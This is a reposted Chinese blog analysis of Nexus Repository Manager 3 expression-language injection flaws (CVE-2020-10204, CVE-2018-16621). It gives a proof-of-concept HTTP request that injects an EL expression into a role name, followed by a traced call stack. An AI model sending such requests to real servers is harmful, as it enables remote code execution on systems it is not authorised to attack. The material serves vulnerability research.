标签：engine hibernate Repository Nexus nexus Manager validator org internal

参考

• https://support.sonatype.com/hc/en-us/articles/360044882533
• https://cloud.tencent.com/announce/detail/1023
• https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA
• https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
• https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

漏洞描述

XSS就算了。
RCE：

an attacker with any type of account on NXRM to execute arbitrary code by crafting a malicious request to NXRM

影响范围：3.21.1

http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz

修复版本：3.21.2

http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz

CVE-2020-10204

管理员权限的RCE：

The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.

参考：
https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

应该是CVE-2018-16621的绕过吧。
在Mac上复现成功。

在Windows上，报了这个错：

javax.el.ELException: java.lang.IllegalArgumentException: object is not an instance of declaring class

杂

历史版本下载：

https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3

CVE-2018-16621 Nexus EL表达式注入

参考：https://github.com/Cryin/Paper/blob/master/CVE-2018-16621%20Nexus%20Repository%20Manager3%20%E4%BB%BB%E6%84%8FEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5.md

PoC：

POST /service/extdirect HTTP/1.1
Host: 192.168.85.129:8081
Content-Type: application/json
Connection: close
Cookie: fusionauth.locale=zh_CN; remember-me=YWRtaW46MTU4NjQyMDcwNTI5ODo5ZmJhMGViMDFjYjM2MmEzNGU5YWQ2MTExYTYwZWNjNQ; JSESSIONID=FD1D448F8785A262DC6453B773955371; username="FS1YvSKKiX8_"; password="FS1YvSKKiX8_"; rememberme="false"; validation="8ab366e87f98368ce07c2c89f9064073"; XSRF-TOKEN=46b5a232-f694-4e27-930d-9e0163f5e310; NXSESSIONID=e5682534-b930-4491-ab86-aa02e5f32a12
Content-Length: 218

{"action":"coreui_User","method":"create","data":[{"userId":"test123","firstName":"77","lastName":"cai","password":"password","email":"77@qq.com","status":"active","roles":["nx-admin${7776+1}"]}],"type":"rpc","tid":49}

当请求的role名不存在时，会加入到missing中，
nexus-3.13.0-01\system\org\sonatype\nexus\nexus-security\3.13.0-01\nexus-security-3.13.0-01.jar!\org\sonatype\nexus\security\role\RolesExistValidator#isValid

            try {
                this.authorizationManager.getRole(String.valueOf(item));
            } catch (NoSuchRoleException var6) {
                missing.add(item);
            }

最后跟到这里：
nexus-3.13.0-01\system\org\hibernate\hibernate-validator\5.1.2.Final\hibernate-validator-5.1.2.Final.jar!\org\hibernate\validator\internal\engine\messageinterpolation\InterpolationTerm#interpolateExpressionLanguageTerm

部分调用栈贴一下：

interpolateExpressionLanguageTerm:112, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:90, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolateExpression:342, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:298, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:182, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:362, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolation:271, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolations:232, ValidationContext (org.hibernate.validator.internal.engine)
validateSingleConstraint:291, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:133, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:91, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraint:83, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:547, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForNonDefaultGroup:511, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:448, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:403, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraint:723, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraints:601, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParametersInContext:992, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:300, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:254, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:65, ValidationInterceptor (org.sonatype.nexus.validation.internal)
invoke:51, ValidationInterceptor (org.sonatype.nexus.validation.internal)

执行完之后：

证明确实在这里执行了EL表达式。

杂

碰到这样的错误，

参考：
https://stackoverflow.com/questions/53021763/cannot-open-local-storage-nexus3-db-config-with-mode-rw-db-name-config

将nexus换到另一个目录下，可能跟之前启动的nexus的orintdb冲突了。

标签：engine,hibernate,Repository,Nexus,nexus,Manager,validator,org,internal
来源： https://blog.csdn.net/caiqiiqi/article/details/105276047

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。